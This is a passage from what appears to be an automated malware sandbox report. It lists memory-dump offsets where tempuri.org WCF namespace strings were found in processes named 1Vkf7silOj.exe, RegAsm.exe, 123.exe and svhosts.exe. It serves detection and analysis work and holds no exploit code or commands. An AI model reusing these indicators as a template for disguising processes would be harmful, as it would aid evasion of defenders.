0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002D7F000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.000000000297A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002918000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029AB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A9F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002C8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13
Source: RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002FE3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13LR
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.000000000297A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.000000000297A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002918000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029AB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A9F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002C8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14
Source: RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002FE3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14LR
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.000000000297A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.000000000297A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002918000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029AB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A9F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002C8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15
Source: RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002FE3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15LR
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.00000000031A4000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.000000000297A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002918000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029AB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A9F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002C8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16
Source: RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002FE3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16LR
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.000000000297A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002D7F000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.000000000297A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002918000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029AB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A9F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002C8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17
Source: RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002FE3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17LR
